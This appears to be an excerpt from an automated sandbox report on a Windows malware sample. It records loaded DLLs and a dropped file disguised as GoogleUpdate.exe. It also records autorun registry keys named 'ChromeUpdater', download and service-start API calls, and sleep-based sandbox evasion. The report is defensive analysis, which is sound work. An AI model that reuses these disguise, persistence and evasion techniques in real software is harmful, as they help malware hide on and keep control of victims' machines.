                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\reg.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: DB5rQYsfd6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: DB5rQYsfd6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: DB5rQYsfd6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: DB5rQYsfd6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: DB5rQYsfd6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: DB5rQYsfd6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: DB5rQYsfd6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: DB5rQYsfd6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: DB5rQYsfd6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: DB5rQYsfd6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: DB5rQYsfd6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: DB5rQYsfd6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041A8DA
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004542E6 push ecx; ret 0_2_004542F9
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00432BD6 push ecx; ret 0_2_00432BE9
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00454C08 push eax; ret 0_2_00454C26
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004542E6 push ecx; ret 10_2_004542F9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00432BD6 push ecx; ret 10_2_00432BE9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00454C08 push eax; ret 10_2_00454C26
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02DA42E6 push ecx; ret 13_2_02DA42F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D500D8 push es; iretd 13_2_02D500D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5008C push es; iretd 13_2_02D5008D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02DAB4FD push esi; ret 13_2_02DAB506
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D82BD6 push ecx; ret 13_2_02D82BE9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02DA4C08 push eax; ret 13_2_02DA4C26
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004542E6 push ecx; ret 15_2_004542F9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00432BD6 push ecx; ret 15_2_00432BE9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00454C08 push eax; ret 15_2_00454C26
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004542E6 push ecx; ret 18_2_004542F9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00432BD6 push ecx; ret 18_2_00432BE9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00454C08 push eax; ret 18_2_00454C26

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004063C6 ShellExecuteW,URLDownloadToFileW,0_2_004063C6
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeFile created: C:\ProgramData\GoogleDat\GoogleUpdate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeFile created: C:\ProgramData\GoogleDat\GoogleUpdate.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00418A00
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChromeUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChromeUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ChromeUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ChromeUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041A8DA
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040E18D Sleep,ExitProcess,0_2_0040E18D
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040E18D Sleep,ExitProcess,10_2_0040E18D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5E18D Sleep,ExitProcess,13_2_02D5E18D
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040E18D Sleep,ExitProcess,15_2_0040E18D
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040E18D Sleep,ExitProcess,18_2_0040E18D
                  Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeStalling execution: Execution stalls by calling Sleepgraph_10-46610
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_004186FE
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_004186FE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_02D686FE
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_004186FE
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,18_2_004186FE
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeWindow / User API: threadDelayed 3380Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeWindow / User API: threadDelayed 2813Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeWindow / User API: threadDelayed 868Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeWindow / User API: foregroundWindowGot 605Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeWindow / User API: foregroundWindowGot 1073Jump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeEvaded block: after key decisiongraph_0-45264
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeEvaded block: after key decisiongraph_0-45171
                  Source: C:\Windows\SysWOW64\svchost.exeEvaded block: after key decision
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeAPI coverage: 5.9 %
                  Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 5.1 %
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeAPI coverage: 4.9 %
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7928Thread sleep count: 107 > 30Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7928Thread sleep time: -53500s >= -30000sJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7932Thread sleep count: 3380 > 30Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7932Thread sleep time: -10140000s >= -30000sJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7940Thread sleep count: 2813 > 30Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7940Thread sleep time: -8439000s >= -30000sJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7932Thread sleep count: 868 > 30Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7932Thread sleep time: -2604000s >= -30000sJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7940Thread sleep count: 252 > 30Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7940Thread sleep time: -756000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041A01B
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040B28E
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040838E
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004087A0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00407848
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004068CD FindFirstFileW,FindNextFileW,0_2_004068CD
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040AA71
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00417AAB
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040AC78
